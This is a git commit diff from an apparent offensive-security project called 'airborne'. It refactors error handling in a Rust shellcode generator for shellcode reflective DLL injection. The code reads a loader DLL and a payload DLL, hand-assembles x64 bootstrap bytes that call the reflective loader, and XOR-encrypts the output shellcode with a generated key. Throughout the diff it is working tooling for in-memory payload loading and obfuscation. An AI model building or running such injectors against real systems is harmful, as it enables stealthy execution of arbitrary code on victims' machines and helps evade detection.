improved error propagation & cleaned bootstrap layout
This commit is contained in:
parent
2508c1826a
commit
bad17f630f
@ -1,4 +1,7 @@
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use std::{collections::BTreeMap, ffi::CStr, fs, path::PathBuf, slice::from_raw_parts};
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use std::{
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collections::BTreeMap, error::Error, ffi::CStr, fs, path::PathBuf, process::exit,
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slice::from_raw_parts,
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};
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use airborne_utils::calc_hash;
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use airborne_utils::calc_hash;
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use clap::Parser;
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use clap::Parser;
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@ -43,6 +46,7 @@ fn main() {
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// preserve the path from being dropped
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// preserve the path from being dropped
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let output_path = args.output_path.clone();
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let output_path = args.output_path.clone();
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// prepare paths for pretty printing
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let loader_path_str = args.loader_path.to_str().unwrap();
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let loader_path_str = args.loader_path.to_str().unwrap();
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let payload_path_str = args.payload_path.to_str().unwrap();
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let payload_path_str = args.payload_path.to_str().unwrap();
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let output_path_str = args.output_path.to_str().unwrap();
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let output_path_str = args.output_path.to_str().unwrap();
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@ -51,29 +55,66 @@ fn main() {
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println!("[+] payload: {}", payload_path_str);
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println!("[+] payload: {}", payload_path_str);
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println!("[+] output: {}", output_path_str);
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println!("[+] output: {}", output_path_str);
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let mut loader_b = fs::read(args.loader_path).expect("failed to read sRDI DLL");
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let mut loader_b = match fs::read(args.loader_path) {
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let mut payload_b = fs::read(args.payload_path).expect("failed to read payload DLL");
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Ok(b) => b,
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Err(e) => {
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eprintln!("[-] failed to read loader DLL: {}", e);
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exit(1);
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}
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};
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let mut payload_b = match fs::read(args.payload_path) {
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Ok(b) => b,
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Err(e) => {
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eprintln!("[-] failed to read payload DLL: {}", e);
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exit(1);
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}
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};
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let function_hash = calc_hash(args.function_name.as_bytes());
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let function_hash = calc_hash(args.function_name.as_bytes());
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let mut shellcode = gen_sc(
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let mut shellcode = match gen_sc(
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&mut loader_b,
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&mut loader_b,
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&mut payload_b,
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&mut payload_b,
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function_hash,
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function_hash,
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args.parameter,
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args.parameter,
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args.flag,
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args.flag,
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);
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) {
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Ok(sc) => sc,
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Err(e) => {
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eprintln!("[-] failed to generate shellcode: {}", e);
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exit(1);
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}
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};
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println!("\n[+] xor'ing shellcode");
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println!("\n[+] xor'ing shellcode");
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let key = gen_xor_key(shellcode.len());
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let key = gen_xor_key(shellcode.len());
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airborne_utils::xor_cipher(&mut shellcode, &key);
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airborne_utils::xor_cipher(&mut shellcode, &key);
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let mut key_output_path = output_path.clone().into_os_string();
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let mut key_output_path = output_path.clone().into_os_string();
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key_output_path.push(".key");
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key_output_path.push(".key");
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// prepare path for pretty printing
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let key_output_path_str = key_output_path.to_str().unwrap();
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let key_output_path_str = key_output_path.to_str().unwrap();
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println!("\n[+] writing shellcode to '{}'", output_path_str);
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println!(
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fs::write(output_path, shellcode).expect("failed to write shellcode to output file");
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"\n[+] writing shellcode to '{}' and xor key to '{}'",
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println!("[+] writing xor key to '{}'", key_output_path_str);
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output_path_str, key_output_path_str
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fs::write(key_output_path, key).expect("failed to write xor key to output file");
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);
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match fs::write(output_path, shellcode) {
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Ok(_) => (),
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Err(e) => {
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eprintln!("[-] failed to write shellcode to output file: {}", e);
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exit(1);
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}
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};
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match fs::write(key_output_path, key) {
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Ok(_) => (),
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Err(e) => {
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eprintln!("[-] failed to write xor key to output file: {}", e);
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exit(1);
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}
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};
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}
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}
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fn gen_sc(
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fn gen_sc(
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@ -82,159 +123,117 @@ fn gen_sc(
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function_hash: u32,
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function_hash: u32,
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parameter: String,
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parameter: String,
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flag: u32,
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flag: u32,
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) -> Vec<u8> {
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) -> Result<Vec<u8>, Box<dyn Error>> {
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let loader_addr = export_ptr_by_name(loader_b.as_mut_ptr(), LOADER_ENTRY_NAME)
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let loader_addr = export_ptr_by_name(loader_b.as_mut_ptr(), LOADER_ENTRY_NAME)?;
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.expect("failed to get loader entry point");
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let loader_offset = loader_addr as usize - loader_b.as_mut_ptr() as usize;
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let loader_offset = loader_addr as usize - loader_b.as_mut_ptr() as usize;
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println!("[+] loader offset: {:#x}", loader_offset);
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println!("[+] loader offset: {:#x}", loader_offset);
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// 64-bit bootstrap source: https:// github.com/memN0ps/srdi-rs/blob/main/generate_shellcode
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// 64-bit bootstrap source: https:// github.com/memN0ps/srdi-rs/blob/main/generate_shellcode
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// TODO: clean up & fix 'call to push immediately after creation' compiler warning by
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// calculating little-endian representations of variables (flag, parameter length & offset,
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// function hash, payload offset, loader address) beforehand
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let mut bootstrap: Vec<u8> = Vec::new();
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/*
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1.) save the current location in memory for calculating offsets later
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*/
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// call 0x00 (this will push the address of the next function to the stack)
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bootstrap.push(0xe8);
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bootstrap.push(0x00);
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bootstrap.push(0x00);
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bootstrap.push(0x00);
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bootstrap.push(0x00);
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// pop rcx - this will pop the value we saved on the stack into rcx to capture our current location in memory
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bootstrap.push(0x59);
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// mov r8, rcx - copy the value of rcx into r8 before we start modifying RCX
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bootstrap.push(0x49);
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bootstrap.push(0x89);
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bootstrap.push(0xc8);
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/*
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2.) align the stack and create shadow space
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*/
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// push rsi - save original value
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bootstrap.push(0x56);
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// mov rsi, rsp - store our current stack pointer for later
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bootstrap.push(0x48);
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bootstrap.push(0x89);
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bootstrap.push(0xe6);
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// and rsp, 0x0FFFFFFFFFFFFFFF0 - align the stack to 16 bytes
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bootstrap.push(0x48);
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bootstrap.push(0x83);
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bootstrap.push(0xe4);
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bootstrap.push(0xf0);
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// sub rsp, 0x30 (48 bytes) - create shadow space on the stack, which is required for x64. A minimum of 32 bytes for rcx, rdx, r8, r9. Then other params on stack
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bootstrap.push(0x48);
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bootstrap.push(0x83);
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bootstrap.push(0xec);
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bootstrap.push(6 * 8); // 6 args that are 8 bytes each
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/*
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3.) setup reflective loader parameters: place the last 5th and 6th arguments on the stack (rcx, rdx, r8, and r9 are already on the stack as the first 4 arguments)
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*/
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// mov qword ptr [rsp + 0x20], rcx (shellcode base + 5 bytes) - (32 bytes) Push in arg 5
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bootstrap.push(0x48);
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bootstrap.push(0x89);
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bootstrap.push(0x4C);
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bootstrap.push(0x24);
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bootstrap.push(4 * 8); // 5th arg
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// sub qword ptr [rsp + 0x20], 0x5 (shellcode base) - modify the 5th arg to get the real shellcode base
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bootstrap.push(0x48);
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bootstrap.push(0x83);
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bootstrap.push(0x6C);
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bootstrap.push(0x24);
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bootstrap.push(4 * 8); // 5th arg
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bootstrap.push(5); // minus 5 bytes because call 0x00 is 5 bytes to get the allocate memory from VirtualAllocEx from injector
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// mov dword ptr [rsp + 0x28], <flag> - (40 bytes) Push arg 6 just above shadow space
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bootstrap.push(0xC7);
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bootstrap.push(0x44);
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bootstrap.push(0x24);
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bootstrap.push(5 * 8); // 6th arg
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bootstrap.append(&mut flag.to_le_bytes().to_vec().clone());
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/*
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4.) setup reflective loader parameters: 1st -> rcx, 2nd -> rdx, 3rd -> r8, 4th -> r9
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*/
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// mov r9, <parameter_length> - copy the 4th parameter, which is the length of the user data into r9
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bootstrap.push(0x41);
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bootstrap.push(0xb9);
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let parameter_length = parameter.len() as u32; // This must u32 or it breaks assembly
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bootstrap.append(&mut parameter_length.to_le_bytes().to_vec().clone());
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// add r8, <parameter_offset> + <payload_length> - copy the 3rd parameter, which is address of the user function into r8 after calculation
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bootstrap.push(0x49);
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bootstrap.push(0x81);
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bootstrap.push(0xc0); // minus 5 because of the call 0x00 instruction
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let parameter_offset =
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let parameter_offset =
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(BOOTSTRAP_TOTAL_LENGTH - 5) + loader_b.len() as u32 + payload_b.len() as u32;
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BOOTSTRAP_TOTAL_LENGTH - 5 + loader_b.len() as u32 + payload_b.len() as u32;
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bootstrap.append(&mut parameter_offset.to_le_bytes().to_vec().clone());
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let payload_offset = BOOTSTRAP_TOTAL_LENGTH - 5 + loader_b.len() as u32;
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// mov edx, <prameter_hash> - copy the 2nd parameter, which is the hash of the user function into edx
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// 1.) save the current location in memory for calculating offsets later
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bootstrap.push(0xba);
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let b1: Vec<u8> = vec![
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bootstrap.append(&mut function_hash.to_le_bytes().to_vec().clone());
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0xe8, 0x00, 0x00, 0x00, 0x00, // call 0x00
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0x59, // pop rcx
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0x49, 0x89, 0xc8, // mov r8, rcx
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];
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// add rcx, <payload_offset> - copy the 1st parameter, which is the address of the user dll into rcx after calculation
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// 2.) align the stack and create shadow space
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bootstrap.push(0x48);
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let b2: Vec<u8> = vec![
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bootstrap.push(0x81);
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0x56, // push rsi
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bootstrap.push(0xc1); // minus 5 because of the call 0x00 instruction
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0x48,
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let payload_offset = (BOOTSTRAP_TOTAL_LENGTH - 5) + loader_b.len() as u32; // mut be u32 or it breaks assembly
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0x89,
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bootstrap.append(&mut payload_offset.to_le_bytes().to_vec().clone());
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0xe6, // mov rsi, rsp
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0x48,
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0x83,
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0xe4,
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0xf0, // and rsp, 0x0FFFFFFFFFFFFFFF0
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0x48,
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0x83,
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0xec,
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6 * 8, // sub rsp, 0x30
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];
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/*
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// 3.) setup reflective loader parameters: place the last 5th and 6th arguments on the stack
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5.) call the reflective loader
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let b3: Vec<u8> = vec![
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*/
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0x48,
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0x89,
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0x4C,
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0x24,
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4 * 8, // mov qword ptr [rsp + 0x20], rcx
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0x48,
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0x83,
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0x6C,
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0x24,
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4 * 8,
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5, // sub qword ptr [rsp + 0x20], 0x5
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0xC7,
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0x44,
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0x24,
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5 * 8, // mov dword ptr [rsp + 0x28], <flag>
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]
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.into_iter()
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.chain(flag.to_le_bytes().to_vec())
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.collect();
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// call <loader_offset> - call the reflective loader address after calculation
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// 4.) setup reflective loader parameters: 1st -> rcx, 2nd -> rdx, 3rd -> r8, 4th -> r9
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bootstrap.push(0xe8);
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let b4: Vec<u8> = vec![0x41, 0xb9]
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let loader_address =
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.into_iter()
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(BOOTSTRAP_TOTAL_LENGTH - bootstrap.len() as u32 - 4) + loader_offset as u32; // must be u32 or it breaks assembly
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.chain((parameter.len() as u32).to_le_bytes().to_vec())
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bootstrap.append(&mut loader_address.to_le_bytes().to_vec().clone());
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.chain(vec![
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0x49, 0x81, 0xc0, // add r8, <parameter_offset> + <payload_length>
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])
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.chain(parameter_offset.to_le_bytes().to_vec())
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.chain(vec![
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0xba, // mov edx, <prameter_hash>
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])
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.chain(function_hash.to_le_bytes().to_vec())
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.chain(vec![
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0x48, 0x81, 0xc1, // add rcx, <payload_offset>
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])
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.chain(payload_offset.to_le_bytes().to_vec())
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.collect();
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// padding
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// 5.) call the reflective loader
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bootstrap.push(0x90);
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let bootstrap_len = b1.len() + b2.len() + b3.len() + b4.len() + 1;
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bootstrap.push(0x90);
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let loader_addr = (BOOTSTRAP_TOTAL_LENGTH - bootstrap_len as u32 - 4) + loader_offset as u32;
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let b5: Vec<u8> = vec![
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0xe8, // call <loader_offset>
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]
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.into_iter()
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.chain(loader_addr.to_le_bytes().to_vec())
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.chain(vec![
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0x90, 0x90, // padding
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])
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.collect();
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/*
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// 6.) restore the stack and return to the original location (caller)
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6.) restore the stack and return to the original location (caller)
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let b6: Vec<u8> = vec![
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*/
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0x48, 0x89, 0xf4, // mov rsp, rsi
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0x5e, // pop rsi
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0xc3, // ret
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0x90, 0x90, // padding
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];
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// mov rsp, rsi - reset original stack pointer
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let mut bootstrap: Vec<u8> = b1
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bootstrap.push(0x48);
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.into_iter()
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bootstrap.push(0x89);
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.chain(b2)
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bootstrap.push(0xf4);
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.chain(b3)
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.chain(b4)
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// pop rsi - put things back where they were left
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.chain(b5)
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bootstrap.push(0x5e);
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.chain(b6)
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.collect();
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// ret - return to caller and resume execution flow (avoids crashing process)
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bootstrap.push(0xc3);
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// padding
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bootstrap.push(0x90);
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bootstrap.push(0x90);
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if bootstrap.len() != BOOTSTRAP_TOTAL_LENGTH as usize {
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if bootstrap.len() != BOOTSTRAP_TOTAL_LENGTH as usize {
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panic!("Bootstrap length is not correct, please modify the BOOTSTRAP_TOTAL_LEN constant in the source");
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return Err("invalid bootstrap length".into());
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} else {
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println!("[+] bootstrap size: {}", bootstrap.len());
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}
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}
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println!("[+] reflective loader size: {}", loader_b.len());
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println!("[+] bootstrap size: {} bytes", bootstrap.len());
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println!("[+] payload size: {}", payload_b.len());
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println!("[+] reflective loader size: {} kB", loader_b.len() / 1024);
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println!("[+] payload size: {} kB", payload_b.len() / 1024);
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let mut shellcode = Vec::new();
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let mut shellcode = Vec::new();
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@ -251,7 +250,7 @@ fn gen_sc(
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- user data
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- user data
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*/
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*/
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println!("\n[+] total shellcode size: {}", shellcode.len());
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println!("\n[+] total shellcode size: {} kB", shellcode.len() / 1024);
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println!("\n[+] loader(payload_dll_ptr: *mut c_void, function_hash: u32, user_data_ptr: *mut c_void, user_data_len: u32, shellcode_bin_ptr: *mut c_void, flag: u32)");
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println!("\n[+] loader(payload_dll_ptr: *mut c_void, function_hash: u32, user_data_ptr: *mut c_void, user_data_len: u32, shellcode_bin_ptr: *mut c_void, flag: u32)");
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println!(
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println!(
|
||||||
"[+] arg1: rcx, arg2: rdx, arg3: r8, arg4: r9, arg5: [rsp + 0x20], arg6: [rsp + 0x28]"
|
"[+] arg1: rcx, arg2: rdx, arg3: r8, arg4: r9, arg5: [rsp + 0x20], arg6: [rsp + 0x28]"
|
||||||
@ -265,7 +264,7 @@ fn gen_sc(
|
|||||||
flag
|
flag
|
||||||
);
|
);
|
||||||
|
|
||||||
shellcode
|
Ok(shellcode)
|
||||||
}
|
}
|
||||||
|
|
||||||
fn gen_xor_key(keysize: usize) -> Vec<u8> {
|
fn gen_xor_key(keysize: usize) -> Vec<u8> {
|
||||||
@ -278,61 +277,64 @@ fn gen_xor_key(keysize: usize) -> Vec<u8> {
|
|||||||
key
|
key
|
||||||
}
|
}
|
||||||
|
|
||||||
fn export_ptr_by_name(base_ptr: *mut u8, name: &str) -> Option<*mut u8> {
|
fn export_ptr_by_name(base_ptr: *mut u8, name: &str) -> Result<*mut u8, Box<dyn Error>> {
|
||||||
for (e_name, addr) in unsafe { get_exports(base_ptr) } {
|
for (e_name, addr) in unsafe { get_exports(base_ptr)? } {
|
||||||
if e_name == name {
|
if e_name == name {
|
||||||
return Some(addr as _);
|
return Ok(addr as _);
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
None
|
Err(format!("failed to find export by name: {}", name).into())
|
||||||
}
|
}
|
||||||
|
|
||||||
unsafe fn get_exports(base_ptr: *mut u8) -> BTreeMap<String, usize> {
|
unsafe fn get_exports(base_ptr: *mut u8) -> Result<BTreeMap<String, usize>, Box<dyn Error>> {
|
||||||
let mut exports = BTreeMap::new();
|
let mut exports = BTreeMap::new();
|
||||||
|
|
||||||
let dos_header_ptr = base_ptr as *mut IMAGE_DOS_HEADER;
|
let dos_header_ptr = base_ptr as *mut IMAGE_DOS_HEADER;
|
||||||
|
|
||||||
if (*dos_header_ptr).e_magic != IMAGE_DOS_SIGNATURE {
|
if (*dos_header_ptr).e_magic != IMAGE_DOS_SIGNATURE {
|
||||||
panic!("Failed to get DOS header");
|
return Err("failed to get DOS header for the export".into());
|
||||||
}
|
}
|
||||||
|
|
||||||
let nt_header_ptr = rva_mut::<IMAGE_NT_HEADERS64>(base_ptr, (*dos_header_ptr).e_lfanew as _);
|
let nt_header_ptr = rva_mut::<IMAGE_NT_HEADERS64>(base_ptr, (*dos_header_ptr).e_lfanew as _);
|
||||||
|
|
||||||
let export_dir_ptr = rva_to_offset(
|
let export_dir_ptr = rva_to_offset(
|
||||||
base_ptr as _,
|
base_ptr as _,
|
||||||
&*nt_header_ptr,
|
&*nt_header_ptr,
|
||||||
(*nt_header_ptr).OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT as usize]
|
(*nt_header_ptr).OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT as usize]
|
||||||
.VirtualAddress,
|
.VirtualAddress,
|
||||||
) as *mut IMAGE_EXPORT_DIRECTORY;
|
)? as *mut IMAGE_EXPORT_DIRECTORY;
|
||||||
|
|
||||||
let export_names = from_raw_parts(
|
let export_names = from_raw_parts(
|
||||||
rva_to_offset(
|
rva_to_offset(
|
||||||
base_ptr as _,
|
base_ptr as _,
|
||||||
&*nt_header_ptr,
|
&*nt_header_ptr,
|
||||||
(*export_dir_ptr).AddressOfNames,
|
(*export_dir_ptr).AddressOfNames,
|
||||||
) as *const u32,
|
)? as *const u32,
|
||||||
(*export_dir_ptr).NumberOfNames as _,
|
(*export_dir_ptr).NumberOfNames as _,
|
||||||
);
|
);
|
||||||
|
|
||||||
let export_functions = from_raw_parts(
|
let export_functions = from_raw_parts(
|
||||||
rva_to_offset(
|
rva_to_offset(
|
||||||
base_ptr as _,
|
base_ptr as _,
|
||||||
&*nt_header_ptr,
|
&*nt_header_ptr,
|
||||||
(*export_dir_ptr).AddressOfFunctions,
|
(*export_dir_ptr).AddressOfFunctions,
|
||||||
) as *const u32,
|
)? as *const u32,
|
||||||
(*export_dir_ptr).NumberOfFunctions as _,
|
(*export_dir_ptr).NumberOfFunctions as _,
|
||||||
);
|
);
|
||||||
|
|
||||||
let export_ordinals = from_raw_parts(
|
let export_ordinals = from_raw_parts(
|
||||||
rva_to_offset(
|
rva_to_offset(
|
||||||
base_ptr as _,
|
base_ptr as _,
|
||||||
&*nt_header_ptr,
|
&*nt_header_ptr,
|
||||||
(*export_dir_ptr).AddressOfNameOrdinals,
|
(*export_dir_ptr).AddressOfNameOrdinals,
|
||||||
) as *const u16,
|
)? as *const u16,
|
||||||
(*export_dir_ptr).NumberOfNames as _,
|
(*export_dir_ptr).NumberOfNames as _,
|
||||||
);
|
);
|
||||||
|
|
||||||
for i in 0..(*export_dir_ptr).NumberOfNames as usize {
|
for i in 0..(*export_dir_ptr).NumberOfNames as usize {
|
||||||
let export_name =
|
let export_name =
|
||||||
rva_to_offset(base_ptr as _, &*nt_header_ptr, export_names[i]) as *const i8;
|
rva_to_offset(base_ptr as _, &*nt_header_ptr, export_names[i])? as *const i8;
|
||||||
|
|
||||||
if let Ok(export_name) = CStr::from_ptr(export_name).to_str() {
|
if let Ok(export_name) = CStr::from_ptr(export_name).to_str() {
|
||||||
let export_ordinal = export_ordinals[i] as usize;
|
let export_ordinal = export_ordinals[i] as usize;
|
||||||
@ -342,19 +344,23 @@ unsafe fn get_exports(base_ptr: *mut u8) -> BTreeMap<String, usize> {
|
|||||||
base_ptr as _,
|
base_ptr as _,
|
||||||
&*nt_header_ptr,
|
&*nt_header_ptr,
|
||||||
export_functions[export_ordinal],
|
export_functions[export_ordinal],
|
||||||
),
|
)?,
|
||||||
);
|
);
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
exports
|
Ok(exports)
|
||||||
}
|
}
|
||||||
|
|
||||||
fn rva_mut<T>(base_ptr: *mut u8, rva: usize) -> *mut T {
|
fn rva_mut<T>(base_ptr: *mut u8, rva: usize) -> *mut T {
|
||||||
(base_ptr as usize + rva) as *mut T
|
(base_ptr as usize + rva) as *mut T
|
||||||
}
|
}
|
||||||
|
|
||||||
unsafe fn rva_to_offset(base: usize, nt_header_ref: &IMAGE_NT_HEADERS64, mut rva: u32) -> usize {
|
unsafe fn rva_to_offset(
|
||||||
|
base: usize,
|
||||||
|
nt_header_ref: &IMAGE_NT_HEADERS64,
|
||||||
|
mut rva: u32,
|
||||||
|
) -> Result<usize, Box<dyn Error>> {
|
||||||
let section_header_ptr = rva_mut::<IMAGE_SECTION_HEADER>(
|
let section_header_ptr = rva_mut::<IMAGE_SECTION_HEADER>(
|
||||||
&nt_header_ref.OptionalHeader as *const _ as _,
|
&nt_header_ref.OptionalHeader as *const _ as _,
|
||||||
nt_header_ref.FileHeader.SizeOfOptionalHeader as _,
|
nt_header_ref.FileHeader.SizeOfOptionalHeader as _,
|
||||||
@ -371,9 +377,9 @@ unsafe fn rva_to_offset(base: usize, nt_header_ref: &IMAGE_NT_HEADERS64, mut rva
|
|||||||
rva -= (*section_header_ptr.add(i)).VirtualAddress;
|
rva -= (*section_header_ptr.add(i)).VirtualAddress;
|
||||||
rva += (*section_header_ptr.add(i)).PointerToRawData;
|
rva += (*section_header_ptr.add(i)).PointerToRawData;
|
||||||
|
|
||||||
return base + rva as usize;
|
return Ok(base + rva as usize);
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
0
|
Err(format!("failed to find section for RVA {:#x}", rva).into())
|
||||||
}
|
}
|
||||||
|
Loading…
Reference in New Issue
Block a user